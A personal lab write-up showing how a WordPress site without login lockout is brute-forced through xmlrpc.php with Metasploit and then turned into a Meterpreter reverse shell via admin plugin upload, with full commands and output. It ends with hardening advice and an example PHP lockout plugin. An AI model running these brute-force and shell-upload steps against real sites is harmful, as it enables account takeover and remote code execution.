This was done in my personal lab. I carried it out mainly out of curiosity, because I fell in love with WordPress for the simplicity with which websites can be deployed, though to be honest probably also because I don't want to do a lot of graphics and CSS, not to mention the many free plugins.
This was carried out on a Windows 10 system running WAMP and WordPress, though I don't think WAMP or Windows 10 has any bearing on this attack. Being on Windows 10 or a higher patched version does mean you might not be able to elevate privileges with simple commands like getsystem, etc.
My biggest worry with WordPress has always been its lack of a failed-login count and lockout mechanism; this leaves it very open to login brute-force attacks and username/password credential files, so I set out to see what Metasploit had in the way of credential scanners. The list is quite interesting; some examples are below:
```
Name                                                     Disclosure Date  Rank    Description
----                                                     ---------------  ----    -----------
auxiliary/admin/http/wp_custom_contact_forms             2014-08-07       normal  WordPress custom-contact-forms Plugin SQL Upload
auxiliary/admin/http/wp_easycart_privilege_escalation    2015-02-25       normal  WordPress WP EasyCart Plugin Privilege Escalation
auxiliary/admin/http/wp_wplms_privilege_escalation       2015-02-09       normal  WordPress WPLMS Theme Privilege Escalation
auxiliary/dos/http/wordpress_long_password_dos           2014-11-20       normal  WordPress Long Password DoS
auxiliary/dos/http/wordpress_xmlrpc_dos                  2014-08-06       normal  WordPress XMLRPC DoS
auxiliary/gather/wp_all_in_one_migration_export          2015-03-19       normal  WordPress All-in-One Migration Export
auxiliary/gather/wp_ultimate_csv_importer_user_extract   2015-02-02       normal  WordPress Ultimate CSV Importer User Table Extract
auxiliary/gather/wp_w3_total_cache_hash_extract                           normal  WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract
auxiliary/scanner/http/wordpress_cp_calendar_sqli        2015-03-03       normal  WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner
auxiliary/scanner/http/wordpress_ghost_scanner                            normal  WordPress XMLRPC GHOST Vulnerability Scanner
auxiliary/scanner/http/wordpress_login_enum                               normal  WordPress Brute Force and User Enumeration Utility
auxiliary/scanner/http/wordpress_multicall_creds                          normal  WordPress XML-RPC system.multicall Credential Collector
auxiliary/scanner/http/wordpress_pingback_access                          normal  WordPress Pingback Locator
auxiliary/scanner/http/wordpress_scanner                                  normal  WordPress Scanner
auxiliary/scanner/http/wordpress_xmlrpc_login                             normal  WordPress XML-RPC Username/Password Login Scanner
auxiliary/scanner/http/wp_contus_video_gallery_sqli      2015-02-24       normal  WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner
auxiliary/scanner/http/wp_dukapress_file_read                             normal  WordPress DukaPress Plugin File Read Vulnerability
auxiliary/scanner/http/wp_gimedia_library_file_read                       normal  WordPress GI-Media Library Plugin Directory Traversal Vulnerability
auxiliary/scanner/http/wp_mobile_pack_info_disclosure                     normal  WordPress Mobile Pack Information Disclosure Vulnerability
auxiliary/scanner/http/wp_mobileedition_file_read                         normal  WordPress Mobile Edition File Read Vulnerability
auxiliary/scanner/http/wp_nextgen_galley_file_read                        normal  WordPress NextGEN Gallery Directory Read Vulnerability
auxiliary/scanner/http/wp_simple_backup_file_read                         normal  WordPress Simple Backup File Read Vulnerability
auxiliary/scanner/http/wp_subscribe_comments_file_read                    normal  WordPress Subscribe Comments File Read Vulnerability
```
— In this example I used auxiliary/scanner/http/wordpress_xmlrpc_login:
```
msf > use auxiliary/scanner/http/wordpress_xmlrpc_login
msf auxiliary(wordpress_xmlrpc_login) > show options

Module options (auxiliary/scanner/http/wordpress_xmlrpc_login):

   Name              Current Setting                                            Required  Description
   ----              ---------------                                            --------  -----------
   BRUTEFORCE_SPEED  5                                                          yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                      no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                      no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                      no        Add all users in the current database to the list
   PASSWORD                                                                     no        A specific password to authenticate with
   PASS_FILE                                                                    no        File containing passwords, one per line
   Proxies                                                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.0.1                                                yes       The target address range or CIDR identifier
   RPORT             80                                                         yes       The target port
   SSL               false                                                      no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   true                                                       yes       Stop guessing when a credential works for a host
   TARGETURI         /wp                                                        yes       The base path to the wordpress application
   THREADS           1                                                          yes       The number of concurrent threads
   USERNAME                                                                     no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/wordlists/metasploit/http_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                      no        Try the username as the password for all users
   USER_FILE                                                                    no        File containing usernames, one per line
   VERBOSE           true                                                       yes       Whether to print output for all attempts
   VHOST                                                                        no        HTTP server virtual host

msf auxiliary(wordpress_xmlrpc_login) >
```
-- Running the XML-RPC scanner yielded results (of course I had put the correct username and password in the file, but this is a lab ;) ):

```
msf auxiliary(wordpress_xmlrpc_login) > run

[*] 192.168.0.1:80 :/wp/xmlrpc.php - Sending Hello...
[+] XMLRPC enabled, Hello message received!
[*] Starting XML-RPC login sweep...
[-] WORDPRESS_XMLRPC - Failed: 'connect:connect'
[-] WORDPRESS_XMLRPC - Failed: 'sitecom:sitecom'
[-] WORDPRESS_XMLRPC - Failed: 'admin:1234'
[-] WORDPRESS_XMLRPC - Failed: 'cisco:cisco'
[-] WORDPRESS_XMLRPC - Failed: 'cisco:sanfran'
[-] WORDPRESS_XMLRPC - Failed: 'private:private'
[-] WORDPRESS_XMLRPC - Failed: 'wampp:xampp'
[-] WORDPRESS_XMLRPC - Failed: 'newuser:wampp'
[-] WORDPRESS_XMLRPC - Failed: 'xampp-dav-unsecure:ppmax2011 '
[-] WORDPRESS_XMLRPC - Failed: 'admin:turnkey'
[-] WORDPRESS_XMLRPC - Failed: 'vagrant:vagrant'
[+] WORDPRESS_XMLRPC - Success: 'admin:wp'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_xmlrpc_login) >
```
— With the username and password, I needed to gain access to the system, so I used the module below:

```
exploit/unix/webapp/wp_admin_shell_upload  2015-02-21  excellent  WordPress Admin Shell Upload
```

```
msf exploit(wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   wp               yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.0.1      yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wp              yes       The base path to the wordpress application
   USERNAME   admin            yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   WordPress

msf exploit(wp_admin_shell_upload) >
```
-- I tried a check to see if I could validate the target before doing anything, but that isn't supported by this module:

```
msf exploit(wp_admin_shell_upload) > check
[*] 192.168.0.1:80 This module does not support check.
msf exploit(wp_admin_shell_upload) >
msf exploit(wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Authenticating with WordPress using admin:wp...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp/wp-content/plugins/JhQupUiFGr/EqiugYHZzJ.php...
[*] Sending stage (33721 bytes) to 192.168.0.1
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:55374) at 2016-12-24 18:18:23 +0300
[+] Deleted EqiugYHZzJ.php
[+] Deleted JhQupUiFGr.php

meterpreter > shell
Process 8780 created.
Channel 0 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\wamp64\www\wp\wp-content\plugins\JhQupUiFGr>
```
— Trying to move further resulted in another error, though the point of this demonstration is to show how easy it is to go from a WordPress site that doesn't have login timeouts to shell access.
-- Below is the error I got. In other scenarios everything was fine; I suspect it has to do with Windows 10 security, but I didn't dig into this much further.

```
C:\wamp64\www\wp\wp-content\plugins\JhQupUiFGr>cd c:\
Terminate channel 0? [y/N] y
[-] Error running command shell: Rex::TimeoutError Operation timed out.
meterpreter >
```
- Introduce CAPTCHAs on your WordPress site
- Implement two-factor authentication
- Implement login count (lockout) plugins
The above makes password guessing and brute-forcing difficult, especially for bots and automated tools. There are other ways of gaining access, for example bugs in older versions of WordPress, old versions of the templates you use, and old versions of the plugins you have active; these must be kept current, because each latest release has a fix for something you might not be aware of.
Newer versions might also have vulnerabilities, but it is safe to say they are known by very few and are usually patched the moment the plugin/template author or the WordPress team learns about them.
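As an added illustration of the login-count control (this is example code written for this post, not a plugin the post uses), the must-use plugin below counts failed logins per source IP and refuses further attempts for a while. It hooks the same `authenticate` filter and `wp_login_failed` action that WordPress runs for both the wp-login.php form and xmlrpc.php, which matters because the scan above never touched the login form. Assumptions: the file lives in wp-content/mu-plugins/, the site is not behind a reverse proxy (otherwise REMOTE_ADDR is the proxy's address), and the threshold and window are made-up values.

```php
<?php
/*
Plugin Name: Lab Login Lockout (example)
Description: Per-IP failed-login counter and lockout that also covers XML-RPC logins.
*/

// Constructed values for this example; tune them for your site.
const LAB_LOCKOUT_MAX_FAILS = 5;    // failures allowed inside the window
const LAB_LOCKOUT_WINDOW    = 900;  // window in seconds (15 minutes)

// Transient key per source IP. Assumes no reverse proxy in front of the site.
function lab_lockout_key() {
    return 'lab_lockout_' . md5( $_SERVER['REMOTE_ADDR'] ?? 'unknown' );
}

// wp_login_failed fires from wp_authenticate(), so it sees failures from
// wp-login.php and from every login inside an XML-RPC call (including each
// attempt packed into a system.multicall request).
add_action( 'wp_login_failed', function ( $username ) {
    $key   = lab_lockout_key();
    $fails = (int) get_transient( $key ) + 1;
    set_transient( $key, $fails, LAB_LOCKOUT_WINDOW );
    error_log( sprintf( 'lab-lockout: failed login for "%s" from %s (%d/%d)',
        $username, $_SERVER['REMOTE_ADDR'] ?? 'unknown', $fails, LAB_LOCKOUT_MAX_FAILS ) );
} );

// Priority 30 runs after WordPress's own username/password and email
// handlers (priority 20), so a locked-out source gets an error even when it
// finally guesses the right password.
add_filter( 'authenticate', function ( $user, $username, $password ) {
    if ( (int) get_transient( lab_lockout_key() ) >= LAB_LOCKOUT_MAX_FAILS ) {
        return new WP_Error( 'lab_locked_out',
            'Too many failed login attempts from your address. Try again later.' );
    }
    return $user;
}, 30, 3 );

// A successful interactive login clears the counter for that address.
add_action( 'wp_login', function () {
    delete_transient( lab_lockout_key() );
} );

// The scan above authenticated through xmlrpc.php. If nothing on the site
// needs XML-RPC, this core filter makes every XML-RPC login fail outright.
add_filter( 'xmlrpc_enabled', '__return_false' );
```

Because a rejected attempt during the lockout is itself reported as a failure, the window keeps extending while guessing continues, which is the behaviour you want against an automated sweep like the one shown above.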